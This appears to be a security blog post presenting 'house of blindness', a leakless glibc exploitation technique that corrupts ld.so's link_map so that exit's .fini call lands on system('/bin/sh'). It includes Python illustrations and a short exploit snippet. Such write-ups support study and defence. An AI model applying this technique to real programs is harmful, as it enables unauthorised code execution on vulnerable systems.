introduction

I recently came across this post, which discusses and builds on research stemming from Google Project Zero's look into hacking exit().

It's pretty interesting! The exit function is as ubiquitous as it is hardened. Every program needs to exit, so how libc goes about it matters. Bugs form on complex surfaces, and as more things need to happen at exit (like flushing IO and unloading libraries), exiting gets more complex.

However, exit is fairly hardened. Pointer encryption prevents injecting arbitrary addresses into the exit task chain, and getting around it requires a primitive that's extremely difficult to achieve: arbitrary read. An arbitrary read is needed not only to calculate the libc base but also to leak the TLS xor key used to encrypt pointers. A weaker primitive like a libc leak just isn't sufficient the way it usually is.
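To make the pointer encryption concrete, here's a minimal Python model of the xor-then-rotate scheme glibc uses on x86-64 (XOR with a guard value kept in TLS, then rotate left by 0x11 bits). The function names and both sample values are made up for illustration; this is a sketch of the idea, not glibc's code.

```python
MASK64 = (1 << 64) - 1


def rol64(value, bits):
    """Rotate a 64-bit value left."""
    bits %= 64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value, bits):
    """Rotate a 64-bit value right."""
    bits %= 64
    return ((value >> bits) | (value << (64 - bits))) & MASK64


def ptr_mangle(pointer, guard):
    """Encrypt a function pointer before it is stored in the exit list."""
    return rol64(pointer ^ guard, 0x11)


def ptr_demangle(mangled, guard):
    """Decrypt a stored pointer right before it is called."""
    return ror64(mangled, 0x11) ^ guard


guard = 0x1234567890ABCDEF   # hypothetical per-process secret
target = 0x00007F0000052290  # hypothetical address we'd like called

stored = ptr_mangle(target, guard)
print(hex(stored))                        # what would have to be written
print(hex(ptr_demangle(stored, guard)))   # what exit would end up calling
```

Without the guard there's no way to compute `stored`, which is why a plain libc leak doesn't cut it here.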

As a result, the research so far from binholic and Project Zero is, well, not where it could be. Both rely on powerful primitives to write a generalized exploit against exit, which is unfortunate considering that almost every program using libc relies on it. Reducing these primitives would yield an extremely powerful exploit strategy, one that could work on any program using libc's exit regardless of the actual contents of the program.

The biggest requirement to overcome is the need for leaks. ASLR has been a hacker's worst nightmare, increasing the complexity of exploits several times over. Many smaller exploit chains have two pieces: gain a leak, then use the leak to get RCE. libc is designed around forcing hackers to get a leak before they can pwn; just take a look at the recent heap updates in 2.33, which are designed to force a leak before the heap can be exploited, stomping out potential hacks before they show up.

house of blindness

House of blindness is a new exploit strategy that proves leaks aren't necessary. Its entire premise stems from studying the question of:

how on earth does .fini_array even work?

It's a question even most good pwners couldn't answer. It's not a particularly hard question; most people just don't care. .fini_array is a useful gimmick if you can't overwrite the GOT or need an LSB write on a binary-space address, but its usage in CTFs rarely goes beyond a gimmick.

Until now.

House of blindness isn't a conventional "overwrite .fini_array and win" style exploit. Rather, with a few clever partial writes and some interesting properties of the runtime dynamic linker, we can trick the rtld into miscalculating where .fini is in memory. The only primitive we need is a relative write.

Did I mention we can do this completely leaklessly?

abusing mmap relativity

Consider the following code:

    // get size from user
    char *chunk = malloc(size);
    // get idx and byte from the user
    chunk[idx] = byte;

Although it may not look like it, this allows us to write a byte in libc's memory without needing leaks! There are a couple of things at play here that allow us to do that.

  • When size is sufficiently large, instead of returning a chunk from the heap, malloc "mmaps" a chunk.
  • idx can be negative or exceed size, meaning that we can write anywhere that's a known offset from the chunk.
  • Although two regions mapped by mmap aren't necessarily contiguous, they sit at constant offsets from each other.

Determining these offsets accurately across machines requires a deeper look into how mmap works. I go into more depth about how linkers map segments in memory in this post, but for understanding this exploit, all you need to know is that mmap chunks, libc, and ld are all consistently spaced.

Knowing this, relative write is no longer just a stepping stone towards arbitrary write, but a powerful primitive in its own right.
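Here's a small sketch of why the index survives ASLR. It assumes the usual 0x10-byte chunk header that 64-bit glibc puts in front of an mmapped chunk; `MAP_GAP` and `TARGET_OFFSET` are invented numbers that you'd measure once in a debugger for a given libc and allocation size.

```python
CHUNK_HEADER = 0x10  # malloc chunk header in front of the user pointer (64-bit)


def relative_index(map_gap, target_offset):
    """idx such that chunk[idx] lands on target_base + target_offset.

    map_gap is (target mapping base) - (chunk mapping base); it may be negative.
    """
    return map_gap + target_offset - CHUNK_HEADER


def simulate_run(aslr_base, map_gap):
    """Pretend one process launch: everything slides together."""
    chunk_ptr = aslr_base + CHUNK_HEADER
    target_base = aslr_base + map_gap
    return chunk_ptr, target_base


MAP_GAP = 0x24000       # hypothetical: distance from our chunk's mapping to libc
TARGET_OFFSET = 0x1ED8  # hypothetical: offset of the byte we want inside libc

idx = relative_index(MAP_GAP, TARGET_OFFSET)

# Two "runs" with different randomized bases: the same idx hits the target both times.
for aslr_base in (0x7F1234500000, 0x7FABCDE00000):
    chunk_ptr, target_base = simulate_run(aslr_base, MAP_GAP)
    assert chunk_ptr + idx == target_base + TARGET_OFFSET
```

The absolute addresses change on every run, but `idx` never does, which is the whole point.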

carnage in _dl_fini

Our destructor functions, .fini and .fini_array, are both called in _dl_fini, a function in ld.so. _dl_fini is one of the two functions registered to be called at exit, alongside _IO_cleanup, which is just as interesting but a topic for another day.

Let's take a look at how the destructors are called.

    /* Is there a destructor function? */
    if (l->l_info[DT_FINI_ARRAY] != NULL
        || l->l_info[DT_FINI] != NULL)
      {
        /* When debugging print a message first. */
        if (__builtin_expect (GLRO(dl_debug_mask) & DL_DEBUG_IMPCALLS, 0))
          _dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
                            DSO_FILENAME (l->l_name), ns);

        /* First see whether an array is given. */
        if (l->l_info[DT_FINI_ARRAY] != NULL)
          {
            ElfW(Addr) *array =
              (ElfW(Addr) *) (l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
            unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
                              / sizeof (ElfW(Addr)));
            while (i-- > 0)
              ((fini_t) array[i]) ();
          }

        /* Next try the old-style destructor. */
        if (l->l_info[DT_FINI] != NULL)
          DL_CALL_DT_FINI (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
      }

There's a bit to unpack here! l is a link_map, a data structure that stores a whole lot of data about a specific mapped binary, such as the main executable.

A specific part of the link map is l_info, where the information collected from the .dynamic section of the ELF lives. Here's an example .dynamic section I grabbed from an ELF with Binary Ninja.

.dynamic section example

There are two pieces, a tag and a data value. The tag we're interested in is DT_FINI.
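As a rough illustration of that tag/value layout, here's a short Python sketch that walks a 64-bit .dynamic section, where each entry is a 16-byte Elf64_Dyn: a signed 8-byte tag followed by an 8-byte value. The tag numbers are the standard ELF ones. The sample section is hand-built: 0x1298 is the _fini offset used later in this post, and the other values are invented.

```python
import struct

# Standard ELF dynamic tag numbers
DT_NULL, DT_FINI, DT_DEBUG, DT_FINI_ARRAY, DT_FINI_ARRAYSZ = 0, 13, 21, 26, 28

DYN_ENTRY = struct.Struct("<qQ")  # Elf64_Dyn: d_tag (signed), d_un (value or pointer)


def parse_dynamic(blob):
    """Return (offset, tag, value) for every entry up to the DT_NULL terminator."""
    entries = []
    for off in range(0, len(blob) - DYN_ENTRY.size + 1, DYN_ENTRY.size):
        tag, value = DYN_ENTRY.unpack_from(blob, off)
        if tag == DT_NULL:
            break
        entries.append((off, tag, value))
    return entries


# Hand-built sample section (values other than 0x1298 are made up)
sample = b"".join(
    DYN_ENTRY.pack(tag, value)
    for tag, value in [
        (DT_FINI, 0x1298),
        (DT_FINI_ARRAY, 0x3DB0),
        (DT_FINI_ARRAYSZ, 8),
        (DT_DEBUG, 0),  # filled in by the loader at runtime
        (DT_NULL, 0),
    ]
)

for off, tag, value in parse_dynamic(sample):
    print(f"+{off:#04x}  tag={tag:<3} value={value:#x}")
```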

.fini, old type destructor

    /* Next try the old-style destructor. */
    if (l->l_info[DT_FINI] != NULL)
      DL_CALL_DT_FINI (l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);

l->l_addr is the base of the loaded executable, where you'd see the ELF header in memory. l->l_info[DT_FINI] is a little more interesting. The value of the DT_FINI tag is the offset of the .fini section from the start of the binary. So, to figure out where the fini function is, the linker has a pointer to the DT_FINI entry in .dynamic, l_info[DT_FINI]. It'll dereference it when it comes time to get the offset.

Once it does, it'll add the offset to the base address and call fini.
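The same computation can be modelled in a few lines of Python. This is a toy: `memory` is a bytearray standing in for the process address space (so "addresses" are just indexes into it), and the base address is a typical-looking but made-up PIE base.

```python
import struct

MASK64 = (1 << 64) - 1
DT_FINI = 13


def resolve_fini(memory, l_addr, l_info_fini):
    """Mimic l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr.

    l_info_fini is a pointer to an Elf64_Dyn entry inside `memory`.
    """
    _d_tag, d_ptr = struct.unpack_from("<qQ", memory, l_info_fini)
    return (l_addr + d_ptr) & MASK64


# Toy address space with a single DT_FINI entry at 0x40
memory = bytearray(0x100)
DYN_FINI_AT = 0x40
struct.pack_into("<qQ", memory, DYN_FINI_AT, DT_FINI, 0x1298)

L_ADDR = 0x555555554000  # hypothetical load base of the executable

fini = resolve_fini(memory, L_ADDR, DYN_FINI_AT)
print(hex(fini))
```

Both inputs to that sum live in writable memory: l_addr and the l_info[DT_FINI] pointer sit in the link_map, and the entry it points at is wherever we make it point.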

How do we exploit this?

partial writes on l_info[DT_FINI]

Least significant byte writing is a common leakless tactic in pwn. The low 12 bits of any address aren't affected by ASLR because pages are always aligned to 4096-byte boundaries, so one byte, the least significant byte, is always constant. This isn't any different with our .fini offset pointer. What if we did a partial write on the LSB of this pointer, causing the offset to resolve differently? What if, maybe, it resolves to something totally different?
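A quick sketch of what an LSB overwrite does to a little-endian pointer. The two base addresses and the 0x3df8 offset are invented; 0xb8 simply mirrors the byte used in the final exploit further down.

```python
import struct


def overwrite_lsb(pointer, new_byte):
    """Replace only the least significant byte of a 64-bit little-endian pointer."""
    raw = bytearray(struct.pack("<Q", pointer))
    raw[0] = new_byte  # little-endian: byte 0 is the LSB
    return struct.unpack_from("<Q", raw)[0]


ORIGINAL_OFFSET = 0x3DF8  # hypothetical offset the pointer starts at
WANTED_OFFSET = 0x3DB8    # same 256-byte window, different low byte

# Two page-aligned bases, as if ASLR picked differently on each run
for base in (0x55D1C2A00000, 0x5629F7E45000):
    patched = overwrite_lsb(base + ORIGINAL_OFFSET, 0xB8)
    # The unknown upper bytes are untouched, so the result is right on every run
    assert patched == base + WANTED_OFFSET
```

The catch is the reach: a single byte can only move the pointer within its current 256-byte window.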

plan of attack

Let's come up with an exploit plan. If we want a libc address in our sum of l_addr and l_info[DT_FINI], one of them needs to be a libc address. We know l_addr is a binary-space address; no amount of LSB writing will change that. Whether some set of writes can get l_info[DT_FINI] to point to a libc address, however, is a more open question.

If we can get l_info[DT_FINI] to resolve to a libc address, we can write some constant into l_addr to shift the resulting pointer around in libc, hopefully to system.

This would absolutely ruin the link map after our call, but like, who cares?

the adjacency of .got.plt and .dynamic

We can leverage the adjacency of the .got.plt and .dynamic to get l_info[DT_FINI] to point to an entry in the GOT.

Unfortunately, the .dynamic section is big. Like, way bigger than 256 bytes, meaning just overwriting the LSB isn't enough to take us to the GOT. We'll need to overwrite the two least significant bytes, which unfortunately introduces 4 bits of brute force since we only have 12 bits of consistency. Once we do that, we could set up a pretty cool strategy.

    # move l_info[DT_FINI] from pointing at the _fini offset (0x1298) to read in the GOT (0x7f...)
    write(ld.main_link_map.l_info[DT_FINI], read_got_lsbs)
    # change l_addr from the binary base (0x5c...) to the difference between system and read
    write(ld.main_link_map.l_addr, p64(libc.system - libc.read))

Ignoring how we're going to control $rdi to be /bin/sh for a second, is there a better way to get a libc address into our calculation without having to guess 4 bits of entropy?
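To put a number on those 4 bits, here's a tiny back-of-the-envelope sketch. It only assumes 4 KiB pages; the guessed value 0x4fd8 is arbitrary.

```python
PAGE_BITS = 12  # the low 12 bits of an address are fixed by page alignment


def unknown_bits(bytes_written):
    """How many randomized bits a partial overwrite of this size has to guess."""
    return max(0, bytes_written * 8 - PAGE_BITS)


def success_probability(bytes_written):
    return 1 / (1 << unknown_bits(bytes_written))


def count_hits(guess_low16, page_offset):
    """Try one fixed 2-byte guess against every possible value of bits 12..15."""
    hits = 0
    for nibble in range(16):
        actual_low16 = (nibble << 12) | page_offset
        if actual_low16 == guess_low16:
            hits += 1
    return hits


print(success_probability(1))     # one-byte write: nothing to guess
print(success_probability(2))     # two-byte write: 4 unknown bits
print(count_hits(0x4FD8, 0xFD8))  # how many of the 16 layouts a single guess matches
```

One in sixteen is perfectly workable against a service that restarts, but it's still worse than an exploit that lands every time.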

refining our exploit with _r_debug

However, there doesn't seem to be another way to get a libc address at l_info[DT_FINI] without a two-byte write!

That's actually true. But we may not need a libc address at all: the .dynamic section has one more trick up its sleeve, the DT_DEBUG entry.

When the linker loads the binary, it provides debuggers with a reference to _r_debug, a structure that contains information on the binary's link map.

A pointer to this structure is put inside the .dynamic section for easy access! How convenient. Can we use _r_debug as a drop-in replacement for a libc address?

Yes, actually! Even though _r_debug isn't in libc, it's in ld, so it's mmap relative. Hopefully, we can write some value into l_addr that shifts the result from _r_debug over to system.

Isn't ld.so mapped after libc.so though? We can overwrite l_addr to some big number n so that .fini resolves to _r_debug+n, but what good is that if system is behind _r_debug?

Luckily, we have some tools in our toolbelt as pwners to fix this.

integer overflows

This isn't a particularly hard bug to force. If we made l_addr 0xffffffffffffffff, we'd resolve to _r_debug-1: the sum carries into a 9th byte, but that byte is thrown out because our registers aren't wide enough to hold anything larger than 8 bytes.

I go deeper into this behaviour in this post. For our purposes though, packing our offsets as negative fixes this issue pretty neatly!
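Here's that wraparound in a few lines of Python, using `struct` to pack a negative offset as a signed 64-bit value. Both addresses are invented; the only thing that matters is that system sits below _r_debug.

```python
import struct

MASK64 = (1 << 64) - 1


def add64(a, b):
    """64-bit addition the way the CPU does it: the carry out of bit 63 is dropped."""
    return (a + b) & MASK64


r_debug = 0x7F3A1C2E5118  # hypothetical address of _r_debug (in ld.so)
system = 0x7F3A1C052290   # hypothetical address of system (in libc, lower down)

delta = system - r_debug            # negative number
packed = struct.pack("<q", delta)   # signed pack: the bytes we'd write into l_addr
fake_l_addr = struct.unpack("<Q", packed)[0]

print(hex(fake_l_addr))                  # a huge unsigned value
print(hex(add64(fake_l_addr, r_debug)))  # wraps around and lands on system
```

Note that `delta` only depends on the distance between ld.so and libc, so it's a constant we can compute offline.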

cleaning up

One caveat. Clobbering the link map, specifically l_addr, breaks a lot of stuff, mostly after our call. However, l_addr is also used to locate .fini_array, which runs before .fini, so we'll need to null out l_info[DT_FINI_ARRAY] to keep it from being called.
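A toy model of the two branches in the _dl_fini excerpt shows why. `toy_memory` is a dict standing in for mapped memory (a missing key plays the role of a segfault), and every address and offset except 0x1298 is invented.

```python
MASK64 = (1 << 64) - 1


def planned_calls(read_u64, l_addr, fini_array, fini_arraysz, fini):
    """List the addresses _dl_fini would call, in order.

    fini_array / fini are the d_un values, or None when the l_info slot is NULL.
    """
    calls = []
    if fini_array is not None:
        array = (l_addr + fini_array) & MASK64
        for i in reversed(range(fini_arraysz // 8)):
            calls.append(read_u64((array + 8 * i) & MASK64))
    if fini is not None:
        calls.append((l_addr + fini) & MASK64)
    return calls


BASE = 0x555555554000                 # hypothetical real load base
FAKE_L_ADDR = (-0x292E88) & MASK64    # hypothetical clobbered l_addr

# One .fini_array slot at BASE + 0x3db0 holding one destructor pointer
toy_memory = {BASE + 0x3DB0: BASE + 0x1140}
read_u64 = toy_memory.__getitem__

print([hex(c) for c in planned_calls(read_u64, BASE, 0x3DB0, 8, 0x1298)])

try:
    # Clobbered l_addr with .fini_array still enabled: the array read goes wild
    planned_calls(read_u64, FAKE_L_ADDR, 0x3DB0, 8, 0x1298)
except KeyError as missing:
    print("would fault reading", hex(missing.args[0]))

# With l_info[DT_FINI_ARRAY] nulled, only the .fini call remains
print([hex(c) for c in planned_calls(read_u64, FAKE_L_ADDR, None, 8, 0x1298)])
```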

Another caveat. Even with an arbitrary call into libc, using one-gadgets can get messy, especially when writing an exploit that should work across all libcs. It's often a lot neater if we can control what $rdi points to so we can just call system with /bin/sh.

Luckily for us, our destructors are called right after dl_load_lock is unlocked. The source code details more about this process, but the point is that _dl_fini calls __rtld_lock_unlock_recursive on a lock in ld.so memory. $rdi will be a pointer in ld.so!

Let's just write /bin/sh to our lock. Although there are several issues with writing random data to a mutex that would cause any self-respecting concurrency engineer to go off on you, for our purposes no one actually asked.

the exploit

    # disable fini array from exec
    write(ld.address + link_map + l_info + 8 * DT_FINI_ARRAY, p64(0))
    # overwrite l_info[DT_FINI]'s lsb so that it points at the DT_DEBUG entry, which holds &_r_debug
    write(ld.address + link_map + l_info + 8 * DT_FINI, b"\xb8")
    # overwrite l_addr with offset to bring _r_debug to system
    write(
        ld.address + link_map,
        p64(libc.symbols["system"] - ld.symbols["_r_debug"], signed=True),
    )
    # fill _dl_load_lock with /bin/sh
    write(ld.symbols["_rtld_global"] + _dl_load_lock, b"/bin/sh\x00")

Although this exploit looks like total gibberish without the long and extensive build up associated with it, I think it's very worth it! General exploits are just as useful as they are cool.

the future

There's still lots of improvement to be made and much room for flexibility. Relative write isn't actually necessary; weaker primitives would work too!

Consider global_max_fast overwrites, which allow us to write a heap pointer anywhere relative to the main arena. A similar exploit could be built by making l_info[DT_FINI] reference the heap, where we forge the offsets.

A relative byte write isn't necessary either! Unaligned 8-byte writes are more than enough to pull off the exploit, since we only need to overwrite one LSB.
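A sketch of how that could work: aim the 8-byte write 7 bytes before the pointer, so that only its last byte lands on the pointer's LSB. The bytearray is a stand-in for memory and the values are made up; note that the 7 bytes in front of the pointer get clobbered, so whether this is usable depends on what lives there.

```python
import struct


def write8(memory, addr, payload):
    """The only primitive we assume: an 8-byte write at any (unaligned) address."""
    if len(payload) != 8:
        raise ValueError("primitive writes exactly 8 bytes")
    memory[addr:addr + 8] = payload


def overwrite_lsb_with_qword(memory, pointer_addr, new_lsb, filler=b"\x00" * 7):
    """Start 7 bytes early so the final payload byte replaces the pointer's LSB."""
    write8(memory, pointer_addr - 7, filler + bytes([new_lsb]))


memory = bytearray(32)
PTR_AT = 16
struct.pack_into("<Q", memory, PTR_AT - 8, 0x1111111111111111)  # neighbouring field
struct.pack_into("<Q", memory, PTR_AT, 0x55D1C2A03DF8)          # pointer we care about

overwrite_lsb_with_qword(memory, PTR_AT, 0xB8)

patched = struct.unpack_from("<Q", memory, PTR_AT)[0]
neighbour = struct.unpack_from("<Q", memory, PTR_AT - 8)[0]
print(hex(patched))    # upper 7 bytes of the pointer are untouched
print(hex(neighbour))  # collateral damage in the field before it
```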

Exiting is not a super big issue either! Forcing an exit by corrupting heap state and triggering heap activity is pretty trivial.

There's a whole lot more that we can use such an exploit for. That's what's so great about general exploits: they have a ton of flexibility!